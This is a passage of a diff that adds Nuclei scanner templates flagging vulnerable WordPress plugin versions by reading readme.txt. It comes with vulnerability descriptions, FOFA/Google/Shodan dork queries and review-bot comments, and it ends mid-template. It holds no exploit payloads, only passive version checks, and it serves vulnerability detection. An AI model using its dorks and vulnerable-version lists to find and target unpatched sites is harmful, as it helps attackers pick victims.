+++ b/poc/cve/CVE-2024-48034.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48034 + +info: + name: > + Creates 3D Flipbook, PDF Flipbook <= 1.2 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Creates 3D Flipbook, PDF Flipbook in WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b5c8733-7396-4ae5-862d-15db370dbdd7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48034 + metadata: + fofa-query: "wp-content/plugins/create-flipbook-from-pdf/" + google-query: inurl:"/wp-content/plugins/create-flipbook-from-pdf/" + shodan-query: 'vuln:CVE-2024-48034' + tags: cve,wordpress,wp-plugin,create-flipbook-from-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/create-flipbook-from-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "create-flipbook-from-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48035.yaml b/poc/cve/CVE-2024-48035.yaml new file mode 100644 index 0000000000..dd78766f55 --- /dev/null +++ b/poc/cve/CVE-2024-48035.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48035 + +info: + name: > + ACF Images Search And Insert <= 1.1.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The ACF Images Search And Insert plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/107a0612-5e58-428b-a097-1c4012e89449?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48035 + metadata: + fofa-query: "wp-content/plugins/acf-images-search-and-insert/" + google-query: inurl:"/wp-content/plugins/acf-images-search-and-insert/" + shodan-query: 'vuln:CVE-2024-48035' + tags: cve,wordpress,wp-plugin,acf-images-search-and-insert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-images-search-and-insert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-images-search-and-insert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48037.yaml b/poc/cve/CVE-2024-48037.yaml new file mode 100644 index 0000000000..dd9ebdbb75 --- /dev/null +++ b/poc/cve/CVE-2024-48037.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48037 + +info: + name: > + Contact Form Widget <= 1.4.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Contact Form Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.2. This is due to missing or incorrect nonce validation on the 'delete-contact-query' case in the all-query-page.php file. This makes it possible for unauthenticated attackers to delate contact queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbb5e80a-4dfe-429c-96c1-7fab52e0ce21?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-48037 + metadata: + fofa-query: "wp-content/plugins/new-contact-form-widget/" + google-query: inurl:"/wp-content/plugins/new-contact-form-widget/" + shodan-query: 'vuln:CVE-2024-48037' + tags: cve,wordpress,wp-plugin,new-contact-form-widget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/new-contact-form-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "new-contact-form-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48038.yaml b/poc/cve/CVE-2024-48038.yaml new file mode 100644 index 0000000000..ca7a8396cb --- /dev/null +++ b/poc/cve/CVE-2024-48038.yaml 
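Review bot: The description contains a typo: `delate contact queries` should read `delete contact queries`. CVE-2024-48039 has similar slips, `funcstions` for `functions` and a trailing space inside the quoted name `'cwp_user_fields_data_callback '`, which will defeat a search for that function name. These strings appear to be copied from the advisory feed, so normalising them in the generator would be more durable than editing the files by hand.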
@@ -0,0 +1,59 @@ +id: CVE-2024-48038 + +info: + name: > + wp-Monalisa <= 6.4 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The wp-Monalisa plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.4. This is due to missing or incorrect nonce validation on the wpml_admin() function. This makes it possible for unauthenticated attackers to perform bulk actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6d3396d-708d-45de-b32a-66e17624dc62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-48038 + metadata: + fofa-query: "wp-content/plugins/wp-monalisa/" + google-query: inurl:"/wp-content/plugins/wp-monalisa/" + shodan-query: 'vuln:CVE-2024-48038' + tags: cve,wordpress,wp-plugin,wp-monalisa,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-monalisa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-monalisa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48039.yaml b/poc/cve/CVE-2024-48039.yaml new file mode 100644 index 0000000000..660dd06280 --- /dev/null +++ b/poc/cve/CVE-2024-48039.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48039 + +info: + name: > + CubeWP – All-in-One Dynamic Content Framework <= 1.1.15 - Missing Authorization + author: topscoder + severity: low + description: > + The CubeWP – All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several funcstions like 'cwp_user_fields_data_callback ' and 'cwpform_save_shortcode' in versions up to, and including, 1.1.15. This makes it possible for authenticated attackers, with subscriber-level access and above, to update various plugin settings and export data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/307e3e47-fac8-400d-9b90-b75b39ee14c3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-48039 + metadata: + fofa-query: "wp-content/plugins/cubewp-framework/" + google-query: inurl:"/wp-content/plugins/cubewp-framework/" + shodan-query: 'vuln:CVE-2024-48039' + tags: cve,wordpress,wp-plugin,cubewp-framework,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cubewp-framework/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cubewp-framework" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.15') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48040.yaml b/poc/cve/CVE-2024-48040.yaml new file mode 100644 index 0000000000..be50a9feaf --- /dev/null +++ b/poc/cve/CVE-2024-48040.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48040 + +info: + name: > + Tainacan <= 0.21.8 - Authenticated (Subscriber+) SQL Injection + author: topscoder + severity: low + description: > + The Tainacan plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 0.21.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7783f6fd-02c9-4ff0-ba36-77a0ad5a4bb6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-48040 + metadata: + fofa-query: "wp-content/plugins/tainacan/" + google-query: inurl:"/wp-content/plugins/tainacan/" + shodan-query: 'vuln:CVE-2024-48040' + tags: cve,wordpress,wp-plugin,tainacan,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tainacan/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tainacan" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.21.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48041.yaml b/poc/cve/CVE-2024-48041.yaml new file mode 100644 index 0000000000..5bbd448a25 --- /dev/null +++ b/poc/cve/CVE-2024-48041.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48041 + +info: + name: > + CM Tooltip Glossary <= 4.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The CM Tooltip Glossary plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1cc2bc18-8182-4716-bb34-ffb574d8c874?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-48041 + metadata: + fofa-query: "wp-content/plugins/enhanced-tooltipglossary/" + google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary/" + shodan-query: 'vuln:CVE-2024-48041' + tags: cve,wordpress,wp-plugin,enhanced-tooltipglossary,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enhanced-tooltipglossary" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7417.yaml b/poc/cve/CVE-2024-7417.yaml new file mode 100644 index 0000000000..6878778330 --- /dev/null +++ b/poc/cve/CVE-2024-7417.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7417 + +info: + name: > + Royal Elementor Addons and Templates <= 1.3.986 - Authenticated (Subscriber+) Private Post Disclosure + author: topscoder + severity: low + description: > + The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.986 via the data_fetch. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract data from password protected posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3dfb0b7-5d9f-492b-9a1a-d4445d39c00c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7417 + metadata: + fofa-query: "wp-content/plugins/royal-elementor-addons/" + google-query: inurl:"/wp-content/plugins/royal-elementor-addons/" + shodan-query: 'vuln:CVE-2024-7417' + tags: cve,wordpress,wp-plugin,royal-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/royal-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "royal-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.986') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8032.yaml b/poc/cve/CVE-2024-8032.yaml new file mode 100644 index 0000000000..26c66549ec --- /dev/null +++ b/poc/cve/CVE-2024-8032.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-8032
+
+info:
+ name: >
+ Smooth Gallery Replacement <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Smooth Gallery Replacement plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba8c88e9-e84c-4fe7-a3b1-ee77c49d5590?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8032
+ metadata:
+ fofa-query: "wp-content/plugins/smooth-gallery-replacement/"
+ google-query: inurl:"/wp-content/plugins/smooth-gallery-replacement/"
+ shodan-query: 'vuln:CVE-2024-8032'
+ tags: cve,wordpress,wp-plugin,smooth-gallery-replacement,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smooth-gallery-replacement/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smooth-gallery-replacement"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml b/poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml
new file mode 100644
index 0000000000..1c98681741
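Review bot: The two `version` extractors are identical apart from `internal: true`, and nothing in the file says why both exist. As far as the template shows, the internal one supplies `version` to `compare_versions` and the second only reports the captured tag in the result; a comment on each, `# internal: feeds the dsl matcher` and `# reported: shows the detected version in output`, would stop a later edit from deleting one as a duplicate. The same pair appears in every hunk of this diff.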
--- /dev/null
+++ b/poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1
+
+info:
+ name: >
+ KB Support – WordPress Help Desk and Knowledge Base <= 1.6.6 - Missing Authorization to Authenticated (Subscriber+) Multiple Administrator Actions
+ author: topscoder
+ severity: low
+ description: >
+ The KB Support – WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in the /includes/ajax-functions.php file all versions up to, and including, 1.6.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple administrative actions, such as replying to arbitrary tickets, updating the status of any post, deleting any post, adding notes to tickets, flagging or unflagging tickets, and adding or removing ticket participants.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5fb90b3b-08bd-4887-a6bf-054b42d3e403?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 8.1
+ cve-id: CVE-2024-8548
+ metadata:
+ fofa-query: "wp-content/plugins/kb-support/"
+ google-query: inurl:"/wp-content/plugins/kb-support/"
+ shodan-query: 'vuln:CVE-2024-8548'
+ tags: cve,wordpress,wp-plugin,kb-support,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kb-support/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kb-support"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
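Review bot: The template `id` is `CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1` while `cve-id` is the bare `CVE-2024-8548`, so results keyed on `id` will not join cleanly with the CVE used in `classification`; the hunks for CVE-2024-8632, CVE-2024-8740, CVE-2024-8790, CVE-2024-8916, CVE-2024-9206 and CVE-2024-9350 carry the same kind of suffix. This file and the CVE-2024-8632 one also send the identical `kb-support/readme.txt` request with the same `<= 1.6.6` bound, so one outdated install yields two findings backed by a single observation. A header comment such as `# evidence shared with CVE-2024-8632: one readme.txt version read; group by plugin slug when reporting` would make that explicit for whoever triages the output.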
diff --git a/poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml b/poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml
new file mode 100644
index 0000000000..e11b58bc6c
--- /dev/null
+++ b/poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134
+
+info:
+ name: >
+ KB Support – WordPress Help Desk and Knowledge Base <= 1.6.6 - Missing Authorization to Unauthenticated Ticket Reply Exposure
+ author: topscoder
+ severity: high
+ description: >
+ The KB Support – WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'kbs_ajax_load_front_end_replies' and 'kbs_ajax_mark_reply_as_read' functions in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to read replies of any ticket, and mark any reply as read.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/767b1234-5b4a-4baa-9048-7b2e413cdba5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-8632
+ metadata:
+ fofa-query: "wp-content/plugins/kb-support/"
+ google-query: inurl:"/wp-content/plugins/kb-support/"
+ shodan-query: 'vuln:CVE-2024-8632'
+ tags: cve,wordpress,wp-plugin,kb-support,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kb-support/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kb-support"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8700.yaml b/poc/cve/CVE-2024-8700.yaml
new file mode 100644
index 0000000000..bdcbc17d35
--- /dev/null
+++ b/poc/cve/CVE-2024-8700.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8700
+
+info:
+ name: >
+ Event Calendar <= 1.0.4 - Missing Authorization to Unauthenticated Arbitrary Calendar Deletion
+ author: topscoder
+ severity: high
+ description: >
+ The Event Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to delete arbitrary calendars created by the plugin.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9694f4e0-be99-4122-82d2-b22e7422c877?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-8700
+ metadata:
+ fofa-query: "wp-content/plugins/event-calendars/"
+ google-query: inurl:"/wp-content/plugins/event-calendars/"
+ shodan-query: 'vuln:CVE-2024-8700'
+ tags: cve,wordpress,wp-plugin,event-calendars,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-calendars/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "event-calendars"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8719.yaml b/poc/cve/CVE-2024-8719.yaml
new file mode 100644
index 0000000000..80cd9b5614
--- /dev/null
+++ b/poc/cve/CVE-2024-8719.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8719
+
+info:
+ name: >
+ Flexmls® IDX Plugin <= 3.14.22 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Flexmls® IDX Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters like 'MaxBeds' and 'MinBeds' in all versions up to, and including, 3.14.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8719
+ metadata:
+ fofa-query: "wp-content/plugins/flexmls-idx/"
+ google-query: inurl:"/wp-content/plugins/flexmls-idx/"
+ shodan-query: 'vuln:CVE-2024-8719'
+ tags: cve,wordpress,wp-plugin,flexmls-idx,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "flexmls-idx"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.14.22')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml b/poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml
new file mode 100644
index 0000000000..5cf235f977
--- /dev/null
+++ b/poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6
+
+info:
+ name: >
+ GetResponse Forms by Optin Cat <= 2.5.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The GetResponse Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/51d14f45-4c30-4225-998d-f4f829e09bc0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8740
+ metadata:
+ fofa-query: "wp-content/plugins/getresponse/"
+ google-query: inurl:"/wp-content/plugins/getresponse/"
+ shodan-query: 'vuln:CVE-2024-8740'
+ tags: cve,wordpress,wp-plugin,getresponse,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/getresponse/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "getresponse"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml b/poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml
new file mode 100644
index 0000000000..7e1b9e642b
--- /dev/null
+++ b/poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de
+
+info:
+ name: >
+ Social Share With Floating Bar <= 1.0.3 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Social Share With Floating Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8790
+ metadata:
+ fofa-query: "wp-content/plugins/social-share-with-floating-bar/"
+ google-query: inurl:"/wp-content/plugins/social-share-with-floating-bar/"
+ shodan-query: 'vuln:CVE-2024-8790'
+ tags: cve,wordpress,wp-plugin,social-share-with-floating-bar,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/social-share-with-floating-bar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "social-share-with-floating-bar"
+ part: body
+
